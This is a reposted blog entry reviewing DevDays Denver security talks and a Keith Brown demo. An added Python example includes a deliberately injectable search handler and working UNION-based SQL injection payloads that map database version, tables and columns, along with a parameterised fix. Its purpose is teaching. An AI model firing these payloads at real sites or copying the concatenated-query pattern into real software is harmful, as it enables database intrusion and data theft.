This post originated from an RSS feed registered with .NET Buzz
by Brad Wilson.
Original Post: DevDays Wrap-Up
Feed Title: The .NET Guy
Feed Description: A personal blog about technology in general, .NET in specific, and when all else fails, the real world.
DevDays Denver was this past Thursday. I stayed for the opening keynote, and 3 of the 4 sessions. I skipped the 4th, because it was covering ground I already knew very well: Microsoft's OpenHack implementation. Their whitepaper on the topic is absolutely excellent material for any IT person to read.
The opening keynote was decent, if unfocused. The presentation was primarily stringing together people using current and upcoming .NET technologies to solve problems. Unfortunately, when you have 2 minutes to talk about what you're doing, it really just turns into "here's who we are, and what we did, but not much about how we did it".
The 3 web track presentations I saw built on one another. The first presented things you should think about when securing your website; the second illustrated successful SQL Injection and Cross Site Scripting attacks; the third illustrated how to protect yourself from attacks.
Predictably, the first was pretty slow paced. Filling an hour with "things you should think about for security" is a bit of a stretch. The presenter was reasonable for someone who's not a professional, but visibly nervous and anxious.
The second (which was presented by Peter Provost) was by far the best of the three. Peter is clearly very comfortable giving talks, and knew the material very well. The demo style was very good, the pacing was good, and he kept things interesting. While he couldn't dive into things I know he wanted to, he made the best of what he had at hand.
The third presenter seemed like he had 2 hours of material and a 1 hour time slot. He didn't really have an opportunity to dive into any of the code, merely showing that the attacks were no longer successful and imploring us to "look at the code" on the provided DVD for details. He even mentioned that he had to ditch a couple dozen slides from his deck (which Microsoft provides) just to make the presentation doable in an hour.
This was a real let down of a format, personally. Perhaps I'm a bit spoiled, but 3 days prior to DevDays, our Pragmatic Practitioners meeting talked about security. And, unlike our normal format, we were almost entirely dominated by demos and discussion from security deity Keith Brown, much to the benefit of all.
Having both presentations pretty clear in my mind, it's obvious that Microsoft should've just hired Keith to talk for 3 hours. Keith is a professional trainer, and a security guru. There's no question that I learned more from Keith in a couple hours than I ever could've taken away from Microsoft's slide decks. (Note: this is not a knock on the local presenters, because their hands were tied by the Microsoft-provided materials.)
In the course of our 2.5 hour meeting, Keith showed us how you could exploit something so innocuous as a search box on an e-commerce site that wasn't hardened, to discover the underlying database architecture: OS version, SQL version, all the databases, and learn about any tables and columns we wanted. This was a pretty eye-opening experience.
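To make the search-box attack above (and the SQL Injection attack and defence from the DevDays web track) concrete, here is an added example that is not part of the original post and is not Keith's demo code. It uses an in-memory SQLite database as a stand-in for the SQL Server the talks targeted, so `sqlite_version()` and `sqlite_master` play the roles of `@@version` and `sysobjects`/`syscolumns`; the product catalogue, the `search_vulnerable`/`search_safe` handlers and the payloads are all constructed for illustration. The vulnerable handler concatenates the search term into the query string, which lets a `UNION` clause pull schema metadata out through the same result grid the shop uses to show products; the safe handler passes the term as a bound parameter, so the very same input is just a string nobody's product name matches.

```python
import sqlite3

# Constructed sample schema: a tiny e-commerce catalogue with a table the
# attacker should never be able to see. This is illustration data, not a
# real site.
SCHEMA = """
CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
CREATE TABLE customers(id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT);
INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
INSERT INTO customers VALUES (1, 'alice@example.com', '4242');
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    # Hypothetical "search box" handler that builds SQL by string
    # concatenation. A single quote in `term` ends the literal and the rest
    # of the input becomes SQL.
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    # Same query with the term bound as a parameter: the driver sends the
    # text as data, so quotes and keywords in it have no syntactic effect.
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


# Each payload closes the LIKE literal, appends a UNION with the same
# column count as the real query (two columns), and comments out the
# trailing "%'" with "--". On SQL Server the UNION would read from
# @@version, sys.databases and sys.columns instead.
PAYLOAD_VERSION = "' UNION SELECT sqlite_version(), 0 --"
PAYLOAD_TABLES = "' UNION SELECT name, sql FROM sqlite_master WHERE type='table' --"


def payload_columns(table):
    # pragma_table_info() is SQLite's table-valued function for a table's
    # columns (SQLite 3.16+); the stand-in for syscolumns.
    return "' UNION SELECT name, type FROM pragma_table_info('" + table + "') --"


def enumerate_via_injection(conn):
    """Drive the vulnerable search box to map the database, as an attacker
    with nothing but the search form would. Returns the recovered metadata."""
    version_rows = search_vulnerable(conn, PAYLOAD_VERSION)
    # Genuine product rows come back too; the injected row is the one whose
    # first column is not a product name.
    products = {r[0] for r in conn.execute("SELECT name FROM products")}
    version = next(r[0] for r in version_rows if r[0] not in products)

    table_rows = search_vulnerable(conn, PAYLOAD_TABLES)
    tables = sorted(r[0] for r in table_rows if r[0] not in products)

    columns = {}
    for t in tables:
        col_rows = search_vulnerable(conn, payload_columns(t))
        columns[t] = sorted(r[0] for r in col_rows if r[0] not in products)
    return {"version": version, "tables": tables, "columns": columns}


if __name__ == "__main__":
    db = build_db()
    print("legit search:", search_vulnerable(db, "wid"))
    print("injected map:", enumerate_via_injection(db))
    # The identical payload against the parameterised handler finds nothing.
    print("safe handler:", search_safe(db, PAYLOAD_TABLES))
```

Filtering genuine product rows out of the injected result is only there to make the recovered metadata easy to read; a real attacker simply eyeballs the extra rows in the page. Note that binding the parameter stops injection but does not stop `%` and `_` in the user's input from acting as LIKE wildcards, which is a separate (and far less serious) input-handling issue.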
Not to sound like a shill, but anybody who wants to seriously learn about security should consider hiring Keith to come into their company and teach. It's well worth the time and money.